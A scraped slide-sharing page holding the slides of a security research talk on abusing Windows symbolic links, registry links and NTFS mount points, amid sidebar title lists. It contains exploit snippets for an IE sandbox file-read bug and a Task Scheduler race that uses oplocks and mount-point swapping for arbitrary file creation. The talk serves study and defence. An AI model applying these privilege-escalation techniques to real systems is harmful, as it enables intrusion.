[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
[CB17] Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
 
Kernel Hijacking Is Not an Option: MemoryRanger Comes to The Rescue Again
Kernel Hijacking Is Not an Option: MemoryRanger Comes to The Rescue AgainKernel Hijacking Is Not an Option: MemoryRanger Comes to The Rescue Again
Kernel Hijacking Is Not an Option: MemoryRanger Comes to The Rescue Again
 
SearchMonkey
SearchMonkeySearchMonkey
SearchMonkey
 
OWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web AttacksOWASP Pune Chapter : Dive Into The Profound Web Attacks
OWASP Pune Chapter : Dive Into The Profound Web Attacks
 
stackconf 2020 | Speeding up Linux disk encryption by Ignat Korchagin
stackconf 2020 | Speeding up Linux disk encryption by Ignat Korchaginstackconf 2020 | Speeding up Linux disk encryption by Ignat Korchagin
stackconf 2020 | Speeding up Linux disk encryption by Ignat Korchagin
 
Andrii Yatsenko "Make the most of Twig"
Andrii Yatsenko "Make the most of Twig"Andrii Yatsenko "Make the most of Twig"
Andrii Yatsenko "Make the most of Twig"
 
Brighton SEO 2021 - A Deep Dive into the Depths of DevTools
Brighton SEO 2021 - A Deep Dive into the Depths of DevToolsBrighton SEO 2021 - A Deep Dive into the Depths of DevTools
Brighton SEO 2021 - A Deep Dive into the Depths of DevTools
 
Wordpress Security 101
Wordpress Security 101Wordpress Security 101
Wordpress Security 101
 
Static and Dynamic Analysis at Ning
Static and Dynamic Analysis at NingStatic and Dynamic Analysis at Ning
Static and Dynamic Analysis at Ning
 
Tactical Information Gathering
Tactical Information GatheringTactical Information Gathering
Tactical Information Gathering
 
Ext 0523
Ext 0523Ext 0523
Ext 0523
 
Security Checklist for TYPO3
Security Checklist for TYPO3Security Checklist for TYPO3
Security Checklist for TYPO3
 
Thinking hard about_python
Thinking hard about_pythonThinking hard about_python
Thinking hard about_python
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
 
2012 coscup - Build your PHP application on Heroku
2012 coscup - Build your PHP application on Heroku2012 coscup - Build your PHP application on Heroku
2012 coscup - Build your PHP application on Heroku
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
Growing pains - PosKeyErrors and other malaises
Growing pains - PosKeyErrors and other malaisesGrowing pains - PosKeyErrors and other malaises
Growing pains - PosKeyErrors and other malaises
 
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEsThotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs
 

More from OWASP Delhi

Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesGetting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesOWASP Delhi
 
Securing dns records from subdomain takeover
Securing dns records from subdomain takeoverSecuring dns records from subdomain takeover
Securing dns records from subdomain takeoverOWASP Delhi
 
Effective Cyber Security Report Writing
Effective Cyber Security Report WritingEffective Cyber Security Report Writing
Effective Cyber Security Report WritingOWASP Delhi
 
Data sniffing over Air Gap
Data sniffing over Air GapData sniffing over Air Gap
Data sniffing over Air GapOWASP Delhi
 
Demystifying Container Escapes
Demystifying Container EscapesDemystifying Container Escapes
Demystifying Container EscapesOWASP Delhi
 
Automating WAF using Terraform
Automating WAF using TerraformAutomating WAF using Terraform
Automating WAF using TerraformOWASP Delhi
 
Actionable Threat Intelligence
Actionable Threat IntelligenceActionable Threat Intelligence
Actionable Threat IntelligenceOWASP Delhi
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap OWASP Delhi
 
Securing AWS environments by Ankit Giri
Securing AWS environments by Ankit GiriSecuring AWS environments by Ankit Giri
Securing AWS environments by Ankit GiriOWASP Delhi
 
Cloud assessments by :- Aakash Goel
Cloud assessments  by :- Aakash GoelCloud assessments  by :- Aakash Goel
Cloud assessments by :- Aakash GoelOWASP Delhi
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarOWASP Delhi
 
Wireless security beyond password cracking by Mohit Ranjan
Wireless security beyond password cracking by Mohit RanjanWireless security beyond password cracking by Mohit Ranjan
Wireless security beyond password cracking by Mohit RanjanOWASP Delhi
 
IETF's Role and Mandate in Internet Governance by Mohit Batra
IETF's Role and Mandate in Internet Governance by Mohit BatraIETF's Role and Mandate in Internet Governance by Mohit Batra
IETF's Role and Mandate in Internet Governance by Mohit BatraOWASP Delhi
 
Malicious Hypervisor - Virtualization in Shellcodes by Adhokshaj Mishra
Malicious Hypervisor - Virtualization in Shellcodes by Adhokshaj MishraMalicious Hypervisor - Virtualization in Shellcodes by Adhokshaj Mishra
Malicious Hypervisor - Virtualization in Shellcodes by Adhokshaj MishraOWASP Delhi
 
ICS Security 101 by Sandeep Singh
ICS Security 101 by Sandeep SinghICS Security 101 by Sandeep Singh
ICS Security 101 by Sandeep SinghOWASP Delhi
 
Thwarting The Surveillance in Online Communication by Adhokshaj Mishra
Thwarting The Surveillance in Online Communication by Adhokshaj MishraThwarting The Surveillance in Online Communication by Adhokshaj Mishra
Thwarting The Surveillance in Online Communication by Adhokshaj MishraOWASP Delhi
 

More from OWASP Delhi (20)

Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesGetting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
 
Securing dns records from subdomain takeover
Securing dns records from subdomain takeoverSecuring dns records from subdomain takeover
Securing dns records from subdomain takeover
 
Effective Cyber Security Report Writing
Effective Cyber Security Report WritingEffective Cyber Security Report Writing
Effective Cyber Security Report Writing
 
Data sniffing over Air Gap
Data sniffing over Air GapData sniffing over Air Gap
Data sniffing over Air Gap
 
UDP Hunter
UDP HunterUDP Hunter
UDP Hunter
 
Demystifying Container Escapes
Demystifying Container EscapesDemystifying Container Escapes
Demystifying Container Escapes
 
Automating WAF using Terraform
Automating WAF using TerraformAutomating WAF using Terraform
Automating WAF using Terraform
 
Actionable Threat Intelligence
Actionable Threat IntelligenceActionable Threat Intelligence
Actionable Threat Intelligence
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
Securing AWS environments by Ankit Giri
Securing AWS environments by Ankit GiriSecuring AWS environments by Ankit Giri
Securing AWS environments by Ankit Giri
 
DMARC Overview
DMARC OverviewDMARC Overview
DMARC Overview
 
Cloud assessments by :- Aakash Goel
Cloud assessments  by :- Aakash GoelCloud assessments  by :- Aakash Goel
Cloud assessments by :- Aakash Goel
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang Bhatnagar
 
Wireless security beyond password cracking by Mohit Ranjan
Wireless security beyond password cracking by Mohit RanjanWireless security beyond password cracking by Mohit Ranjan
Wireless security beyond password cracking by Mohit Ranjan
 
IETF's Role and Mandate in Internet Governance by Mohit Batra
IETF's Role and Mandate in Internet Governance by Mohit BatraIETF's Role and Mandate in Internet Governance by Mohit Batra
IETF's Role and Mandate in Internet Governance by Mohit Batra
 
Malicious Hypervisor - Virtualization in Shellcodes by Adhokshaj Mishra
Malicious Hypervisor - Virtualization in Shellcodes by Adhokshaj MishraMalicious Hypervisor - Virtualization in Shellcodes by Adhokshaj Mishra
Malicious Hypervisor - Virtualization in Shellcodes by Adhokshaj Mishra
 
ICS Security 101 by Sandeep Singh
ICS Security 101 by Sandeep SinghICS Security 101 by Sandeep Singh
ICS Security 101 by Sandeep Singh
 
Thwarting The Surveillance in Online Communication by Adhokshaj Mishra
Thwarting The Surveillance in Online Communication by Adhokshaj MishraThwarting The Surveillance in Online Communication by Adhokshaj Mishra
Thwarting The Surveillance in Online Communication by Adhokshaj Mishra
 

Recently uploaded

The Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightThe Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightSafe Software
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 
الأمن السيبراني - ما لا يسع للمستخدم جهله
الأمن السيبراني - ما لا يسع للمستخدم جهلهالأمن السيبراني - ما لا يسع للمستخدم جهله
الأمن السيبراني - ما لا يسع للمستخدم جهلهMohamed Sweelam
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAnitaRaj43
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamUiPathCommunity
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodJuan lago vázquez
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMKumar Satyam
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuidePixlogix Infotech
 
ADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxFIDO Alliance
 
API Governance and Monetization - The evolution of API governance
API Governance and Monetization -  The evolution of API governanceAPI Governance and Monetization -  The evolution of API governance
API Governance and Monetization - The evolution of API governanceWSO2
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistandanishmna97
 
Quantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation ComputingQuantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation ComputingWSO2
 
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...WSO2
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Choreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software EngineeringChoreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software EngineeringWSO2
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard37
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Bhuvaneswari Subramani
 

Recently uploaded (20)

The Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightThe Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and Insight
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
الأمن السيبراني - ما لا يسع للمستخدم جهله
الأمن السيبراني - ما لا يسع للمستخدم جهلهالأمن السيبراني - ما لا يسع للمستخدم جهله
الأمن السيبراني - ما لا يسع للمستخدم جهله
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by Anitaraj
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDM
 
JavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate GuideJavaScript Usage Statistics 2024 - The Ultimate Guide
JavaScript Usage Statistics 2024 - The Ultimate Guide
 
ADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptxADP Passwordless Journey Case Study.pptx
ADP Passwordless Journey Case Study.pptx
 
API Governance and Monetization - The evolution of API governance
API Governance and Monetization -  The evolution of API governanceAPI Governance and Monetization -  The evolution of API governance
API Governance and Monetization - The evolution of API governance
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Quantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation ComputingQuantum Leap in Next-Generation Computing
Quantum Leap in Next-Generation Computing
 
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Choreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software EngineeringChoreo: Empowering the Future of Enterprise Software Engineering
Choreo: Empowering the Future of Enterprise Software Engineering
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptx
 
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​Elevate Developer Efficiency & build GenAI Application with Amazon Q​
Elevate Developer Efficiency & build GenAI Application with Amazon Q​
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 

Abusing Symlinks on Windows

• 12. Object Manager Symbolic Links

• 13. Named Objects
  IO/File:   \??\C:\Windows\notepad.exe, \Device\NamedPipe\mypipe
  Registry:  \Registry\Machine\Software
  Semaphore: \BaseNamedObjects\MySema
• 14. Creating Object Manager Symbolic Links

    // Create an object manager symbolic link called linkname whose target is
    // targetname; both are native NT object names.
    HANDLE CreateSymlink(LPCWSTR linkname, LPCWSTR targetname) {
      OBJECT_ATTRIBUTES obj_attr;
      UNICODE_STRING name, target;
      HANDLE hLink = nullptr;
      RtlInitUnicodeString(&name, linkname);
      RtlInitUnicodeString(&target, targetname);
      InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
      // NtCreateSymbolicLinkObject is an ntdll export that the public SDK
      // headers do not declare; supply the prototype yourself.
      NtCreateSymbolicLinkObject(&hLink, SYMBOLIC_LINK_ALL_ACCESS, &obj_attr, &target);
      return hLink;
    }
• 15.–21. Object Manager Reparsing
  Parsing name: \MyObjects\Global\MySema
  Call chain: NtOpenSemaphore → ObOpenObjectByName → ObpLookupObjectName → ObpParseSymbolicLink
  ObpLookupObjectName consumes the name one component at a time (the "current component").
  When the component Global turns out to be a symbolic link (Global → \BaseNamedObjects), ObpParseSymbolicLink replaces the consumed prefix with the link target, giving \BaseNamedObjects\MySema, and returns STATUS_REPARSE.
  The lookup then restarts from the root with the rewritten name \BaseNamedObjects\MySema.

• 22. Abusing Object Manager Symbolic Links
  ● Most obvious attack is object squatting
    ○ Redirect privileged object creation to another name
    ○ Open named pipes for attacking impersonation
    ○ Shadowing ALPC ports
  ● File symlink attacks perhaps more interesting!
• 23. Example Vulnerability: IE EPM MOTWCreateFile Information Disclosure
• 24. IE Shell Broker MOTWCreateFile

    // Broker-side open: only files carrying a Mark of the Web, or .url
    // files, are meant to be readable from the sandbox.
    HANDLE MOTWCreateFile(PCWSTR FileName, ...) {
      if (FileHasMOTW(FileName) || IsURLFile(FileName)) {
        return CreateFile(FileName, GENERIC_READ, ...);
      }
      return INVALID_HANDLE_VALUE;
    }

    // The extension test runs on the Win32 path string, before any
    // symbolic link in that path has been followed.
    BOOL IsURLFile(PCWSTR FileName) {
      PCWSTR extension = PathFindExtension(FileName);
      return _wcsicmp(extension, L".url") == 0;
    }
• 25. Win32 Path Support
  Path               Description
  somepath           Relative path to current directory
  c:\somepath        Absolute directory
  \\.\c:\somepath    Device path, canonicalized
  \\?\c:\somepath    Device path, non-canonicalized
  The device path forms are the interesting ones.

• 26.–28. Win32 to Native NT File Paths
  Win32 path:    \\.\c:\somepath
  Native path:   \??\c:\somepath                   (RtlDosPathNameToRelativeNtPathName)
  After lookup:  \Device\HarddiskVolume4\somepath  (ObpLookupObjectName follows the drive letter symbolic link under \??)

• 29.–31. Global Root Symlink
  Win32 path:    \\.\GLOBALROOT\somepath
  Native path:   \??\GLOBALROOT\somepath           (RtlDosPathNameToRelativeNtPathName)
  After lookup:  \somepath                         (ObpLookupObjectName: GLOBALROOT is a symbolic link with an empty target, so the rest of the name is looked up from the object manager root)
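The name walk of slides 15–21 and the GLOBALROOT rewrite of slides 29–31, modelled as an added C example (not code from the deck): win32_to_nt() mimics the prefix rewriting of RtlDosPathNameToRelativeNtPathName for the forms in the Win32 Path table, and ob_resolve() replays ObpLookupObjectName's component-by-component lookup with STATUS_REPARSE restarts over a constructed symlink table. It assumes a drive link \??\C: → \Device\HarddiskVolume4, the empty-target GLOBALROOT link, Global → \BaseNamedObjects, and the \RPC Control\fake.url link of slide 33; MAX_REPARSE is an assumed bound, not the kernel's value.

```c
/* Added example, not the deck's code: a small model of the Object Manager
 * name walk.  win32_to_nt() rewrites Win32 prefixes the way
 * RtlDosPathNameToRelativeNtPathName does; ob_resolve() consumes components
 * left to right and, when the consumed prefix names a symbolic link, splices
 * in its target and restarts from the root (STATUS_REPARSE).
 * The symlink table is constructed for the example. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_REPARSE 64     /* assumed loop bound, not the kernel's value */
#define NAME_CAP    512

typedef struct { const char *name; const char *target; } symlink_t;

/* Constructed object-manager symbolic links: link name -> target name. */
static const symlink_t symlinks[] = {
    { "\\MyObjects\\Global",     "\\BaseNamedObjects" },
    { "\\??\\C:",                "\\Device\\HarddiskVolume4" },
    { "\\??\\GLOBALROOT",        "" },                    /* empty target */
    { "\\RPC Control\\fake.url", "\\??\\C:\\somefile" },  /* link from slide 33 */
};
#define NSYMLINKS (sizeof symlinks / sizeof symlinks[0])

/* OBJ_CASE_INSENSITIVE comparison of the first n bytes. */
static int ci_equal(const char *a, const char *b, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i])) return 0;
    return 1;
}

/* Win32 -> native NT path: \\.\X and \\?\X become \??\X, a drive-letter path
 * gets the \??\ prefix.  Relative paths would need the current directory
 * and are rejected (-1) to keep the model small. */
int win32_to_nt(const char *w, char *out, size_t cap)
{
    const char *rest;
    if (strncmp(w, "\\\\.\\", 4) == 0 || strncmp(w, "\\\\?\\", 4) == 0) rest = w + 4;
    else if (isalpha((unsigned char)w[0]) && w[1] == ':' && w[2] == '\\') rest = w;
    else return -1;
    int n = snprintf(out, cap, "\\??\\%s", rest);
    return (n < 0 || (size_t)n >= cap) ? -1 : 0;
}

/* One pass over path: 1 = a symlink was hit and path rewritten (STATUS_REPARSE),
 * 0 = the walk reached the end with no reparse, -1 = rewritten name too long. */
static int lookup_once(char *path, size_t cap)
{
    size_t len = strlen(path);
    for (size_t i = 1; i <= len; i++) {
        if (i < len && path[i] != '\\') continue;   /* not a component boundary */
        for (size_t k = 0; k < NSYMLINKS; k++) {
            const symlink_t *s = &symlinks[k];
            if (strlen(s->name) != i || !ci_equal(path, s->name, i)) continue;
            char rewritten[NAME_CAP];
            int n = snprintf(rewritten, sizeof rewritten, "%s%s", s->target, path + i);
            if (n < 0 || (size_t)n >= sizeof rewritten || (size_t)n >= cap) return -1;
            memcpy(path, rewritten, (size_t)n + 1);
            return 1;
        }
    }
    return 0;
}

/* Resolve the native name in into out.  Returns the number of reparses
 * taken, or -1 when the reparse bound or the buffer is exceeded. */
int ob_resolve(const char *in, char *out, size_t cap)
{
    if (strlen(in) >= cap) return -1;
    strcpy(out, in);
    int reparses = 0, r;
    while ((r = lookup_once(out, cap)) == 1)
        if (++reparses > MAX_REPARSE) return -1;
    return r < 0 ? -1 : reparses;
}

int main(void)
{
    const char *win32[] = { "\\\\.\\c:\\somepath",
                            "\\\\.\\GLOBALROOT\\RPC Control\\fake.url" };
    char nt[NAME_CAP], resolved[NAME_CAP];
    for (size_t i = 0; i < 2; i++) {
        if (win32_to_nt(win32[i], nt, sizeof nt) != 0) continue;
        int n = ob_resolve(nt, resolved, sizeof resolved);
        printf("%s -> %s -> %s (%d reparses)\n", win32[i], nt, resolved, n);
    }
    ob_resolve("\\MyObjects\\Global\\MySema", resolved, sizeof resolved);
    printf("\\MyObjects\\Global\\MySema -> %s\n", resolved);
    return 0;
}
```

The second resolution is the slide 33 chain: the Win32 name the broker tested ends in .url, yet the object actually opened is \Device\HarddiskVolume4\somefile, so a check on the path string has to be replaced by one on the opened handle or the fully resolved name.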
• 32. Writeable Object Directories from IE Sandbox
  Path                                            Sandbox
  \RPC Control                                    PM
  \Sessions\X\BaseNamedObjects                    PM
  \Sessions\X\AppContainerNamedObjects\SID...     EPM

• 33. Exploiting

    IShDocVwBroker* broker;
    CreateSymlink(L"\\RPC Control\\fake.url", L"\\??\\C:\\somefile");
    broker->MOTWCreateFile(L"\\\\.\\GLOBALROOT\\RPC Control\\fake.url", ...);
    // Read File
• 34. Registry Key Symbolic Links

• 35.–37. Under the hood
  Parsing name: \Registry\Machine\Mylink
  Call chain: NtOpenKey → ObOpenObjectByName → ObpLookupObjectName → CmpParseKey → CmpGetSymbolicLink
  CmpParseKey handles the current component; when that component is a symbolic link key, CmpGetSymbolicLink reads the link target and CmpParseKey returns STATUS_REPARSE with the new name \Registry\Machine\NewKey.

• 38. Serious Limitations
  ● Windows 7 fixed numerous issues with registry symbolic links
    ○ Blocked symlinks between untrusted (user) and trusted (local machine) hives
    ○ Symbolic link must be a valid registry path
  ● MS10-021 ensured it was also available downstream
  ● Still can exploit user to user vulnerabilities such as in IE EPM
    ○ CVE-2013-5054
    ○ CVE-2014-6322
  ● Mitigation (pass flag to RegCreateKeyEx) still undocumented
• 39. NTFS Mount Points / Directory Junctions

• 40.–42. Under the hood
  Parsing name: \??\C:\temp\mylink\file
  Call chain: NtOpenFile → ObOpenObjectByName → ObpLookupObjectName → IopParseDevice → NTFS driver
  The NTFS driver finds that mylink is a mount point whose target is \??\C:\Windows and returns STATUS_REPARSE; the lookup restarts with the rewritten name \??\C:\Windows\file.
• 43. Structure of a Mount Point

    typedef struct MOUNT_POINT_REPARSE_BUFFER {
      ULONG  ReparseTag;             // Header: set to 0xA0000003 for a mount point
      USHORT ReparseDataLength;      // Header
      USHORT Reserved;               // Header
      USHORT SubstituteNameOffset;   // Reparse data: substitute NT name
      USHORT SubstituteNameLength;
      USHORT PrintNameOffset;        // Reparse data: print name
      USHORT PrintNameLength;
      WCHAR  PathBuffer[1];          // String data
    };
• 44. Create a Mount Point

    // Build the reparse data for target, then set it on a fresh directory
    // opened with backup semantics and without following any reparse point
    // already present on it.
    PREPARSE_DATA_BUFFER reparse_buffer = BuildMountPoint(target);
    CreateDirectory(dir);
    HANDLE handle = CreateFile(dir, ...,
                               FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, ...);
    DeviceIoControl(handle, FSCTL_SET_REPARSE_POINT, reparse_buffer,
                    reparse_buffer->ReparseDataLength + REPARSE_DATA_BUFFER_HEADER_SIZE, ...);
• 45. Mount Point Limitations
  ● Directory must be empty to set the reparse data
  ● Target device must be an IO device (no opening registry keys for example)
  ● Target device heavily restricted in IopParseDevice (limited device subset):

    IO_PARSE_CONTEXT *ctx;
    if (ctx->LastReparseTag == IO_REPARSE_TAG_MOUNT_POINT) {
      switch (TargetDeviceType) {
        case FILE_DEVICE_DISK:
        case FILE_DEVICE_CD_ROM:
        case FILE_DEVICE_VIRTUAL_DISK:
        case FILE_DEVICE_TAPE:
          break;
        default:
          return STATUS_IO_REPARSE_DATA_INVALID;
      }
    }
• 46. Example Vulnerability: Windows Task Scheduler TOCTOU Arbitrary File Creation

• 47. Running a Scheduled Task

    void Load_Task_File(string task_name, string orig_hash) {
      string task_path = "c:\\windows\\system32\\tasks\\" + task_name;
      string file_hash = Hash_File(task_path);    // hash task file contents
      if (file_hash != orig_hash) {
        Rewrite_Task_File(task_path);             // rewrite task without impersonation
      }
    }

• 48. System Task Folder
  Writable from normal user privilege, therefore can create a mount point directory

• 49. Winning the Race Condition
  Hash File → ???? → Rewrite Task File → Profit?
• 50. Is that an OPLOCK in your Pocket?

    // Request an opportunistic lock on hFile. The request stays pending until
    // another opener of the file breaks the oplock, so the wait on the event
    // doubles as a notification that the file is being accessed.
    void SetOplock(HANDLE hFile) {
      REQUEST_OPLOCK_INPUT_BUFFER inputBuffer = {};
      REQUEST_OPLOCK_OUTPUT_BUFFER outputBuffer = {};
      OVERLAPPED overlapped = {};
      overlapped.hEvent = CreateEvent(...);
      // hFile must have been opened with FILE_FLAG_OVERLAPPED for the
      // asynchronous request below.
      DeviceIoControl(hFile, FSCTL_REQUEST_OPLOCK,
                      &inputBuffer, sizeof(inputBuffer),
                      &outputBuffer, sizeof(outputBuffer),
                      nullptr, &overlapped);
      WaitForSingleObject(overlapped.hEvent, ...);
    }
• 51-55. Exploitation: User Application vs. Task Scheduler Service (one diagram, built up over five slides)
  Mount point before the race: MyTaskFolder → C:\dummy
  1. User Application: IRegisteredTask::Run
  2. Task Scheduler Service: Open File for Reading C:\Dummy\MyTask (the oplock breaks, Event Set in the user application)
  3. User Application: Change Mount Point Location, MyTaskFolder → C:\windows
  4. User Application: Release Oplock
  5. Task Scheduler Service: Generate and Verify Hash of File C:\Dummy\MyTask
  6. Task Scheduler Service: Rewrite Task File C:\Windows\MyTask
• 56. OPLOCK Limitations
  ● Can’t block on access to standard attributes or FILE_READ_ATTRIBUTES
  ● One-shot, need to be quick to reestablish if opened multiple times
  ● Can get around attribute reading in certain circumstances by oplocking a directory
  ● For example these scenarios open directories for read access:
